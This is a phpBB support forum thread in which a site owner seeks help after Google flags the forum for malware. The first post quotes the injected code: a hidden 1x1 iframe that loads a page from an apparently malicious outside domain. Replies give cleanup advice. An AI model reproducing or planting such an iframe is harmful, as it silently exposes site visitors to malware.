[split from] Malware attack 3.0.8 safe?

Get help with installation and running phpBB 3.0.x here. Please do not post bug reports, feature requests, or MOD-related questions here.
Scam Warning
Forum rules
END OF SUPPORT: 1 January 2017 (announcement)
Locked
User avatar
CaBaMaN
Registered User
Posts: 34
Joined: Sun Nov 28, 2004 11:07 am

[split from] Malware attack 3.0.8 safe?

Post by CaBaMaN »

HELP!!!
Ive just now got a MALWARE Warning:

Code: Select all

Malware
« Zurück

URL: http://caba.de/phpBB3/
Zuletzt geprüft: 13. März 2011

Verdächtiger injizierter Code 	Instanzen
<iframe src='http://l3sd.co.cc/index.php?tp=7f4f8de2c33c88a7
' style='width: 1px; height: 1px; border:0px;'>
	1 oder mehr

This is crazy... :o :o
I had some trouble with my server (total lost of Data, then new backup restore), but i didnt change anything ele... :shock:

Could somebody help me here?? I've searched all files in phpbb3, but did not fint this code...

Thanx for any help....
shrapnel09
Registered User
Posts: 28
Joined: Fri Nov 21, 2008 8:52 pm

Re: [split from] Malware attack 3.0.8 safe?

Post by shrapnel09 »

You should probably obfuscate the URL of the source of the iframe as it is currently bearing malware.

Please attach a screenshot of where you're seeing the malware warning and that will help figure out what file from the Templates might contain the bad code.
User avatar
CaBaMaN
Registered User
Posts: 34
Joined: Sun Nov 28, 2004 11:07 am

Re: [split from] Malware attack 3.0.8 safe?

Post by CaBaMaN »

Yes... but where can i find th Iframe?? what do i have to delete and where??

Here is a screenshot of google tools:
malware.jpg
malware.jpg (14.39 KiB) Viewed 1223 times
if i klick details, then the above iframe message is shown...

this is what FIREFOX shows me, when i klick on:

http://www.caba.de/phpBB3/
malware2.jpg
malware2.jpg (148.62 KiB) Viewed 1223 times
if i go to the sourcecode of these sites, there i chan find the above iframe.. but in "viewtopic.php" there is no iframe...
Sorry, this is my first malware and im a little bit panicking... :shock:

how in Phpbb3Mothers name is this possible? and where can i search for this leak? Is it true, that somebody else has inrudet into my system!?!?!? Arghh... :( :(
Last edited by camm15h on Tue Mar 15, 2011 11:58 am, edited 1 time in total.
Reason: Removed bold as per the rules. http://www.phpbb.com/rules/#rule1h
User avatar
CaBaMaN
Registered User
Posts: 34
Joined: Sun Nov 28, 2004 11:07 am

Re: [split from] Malware attack 3.0.8 safe?

Post by CaBaMaN »

Hmm.. i deleted the forum cache, now there is no sign of the Malware iframe...
But i think this is not enough... could somebody give me a clou? thanx very much... ;)
User avatar
CaBaMaN
Registered User
Posts: 34
Joined: Sun Nov 28, 2004 11:07 am

Re: [split from] Malware attack 3.0.8 safe?

Post by CaBaMaN »

Anyone?? Maybe its a phpbb3 Security issue??
x Daniel
I've Been Banned!
Posts: 117
Joined: Sat Jan 16, 2010 11:51 am
Location: Somewhere
Name: Dan
Contact:

Re: [split from] Malware attack 3.0.8 safe?

Post by x Daniel »

I not a security issue with phpBB, go to your forum and go to the url listed in that picture above to that topic, that is where it is saying you problem is.

Image

viewtopic.php?f=104&t=1273&start=660 is where it is saying the problem lies.
x Daniel, Xplozion - Get exclusive web content and phpBB support
Image
User avatar
CaBaMaN
Registered User
Posts: 34
Joined: Sun Nov 28, 2004 11:07 am

Re: [split from] Malware attack 3.0.8 safe?

Post by CaBaMaN »

Hi, Daniel,

i checked all 3 links, there in the Sourcecode of these Sites where the Iframe Injection code....
I just cleared the Cache of the Phpb3, then the injection disappeared....

My fear now is, that there is a security issue on my site... i tought that maybe somebody had the same experience and could help me a little...

Im very thankfull fo any help or clue... thx... ;)
User avatar
topdown
Registered User
Posts: 635
Joined: Wed Sep 19, 2007 5:16 pm
Location: NE Wisconsin
Name: Jeff Behnke
Contact:

Re: [split from] Malware attack 3.0.8 safe?

Post by topdown »

2 things.

#1. Change all FTP login credentials.
#2. Check file and directory permissions http://www.phpbb.com/kb/article/phpbb3- ... rmissions/
User avatar
CaBaMaN
Registered User
Posts: 34
Joined: Sun Nov 28, 2004 11:07 am

Re: [split from] Malware attack 3.0.8 safe?

Post by CaBaMaN »

The first thing i did was changing my passwords....
the File and Folder permissions are as recommended....

I would like to scan my site for iframes..... is there any way to search a sites sourcecode?? like a crawler for sourcecode for websites??

This way i could check if somebody made another iframe injection on my site... or does somebody knows a better/other way??

ThX :D
robandyuk
Registered User
Posts: 4
Joined: Thu Oct 16, 2008 10:11 pm

Re: [split from] Malware attack 3.0.8 safe?

Post by robandyuk »

I have had the same problem. could not find the code anywhere on the site but cleared the cache and it cleared the virus warning, now holding my breath till it comes back.
Locked

Return to “[3.0.x] Support Forum”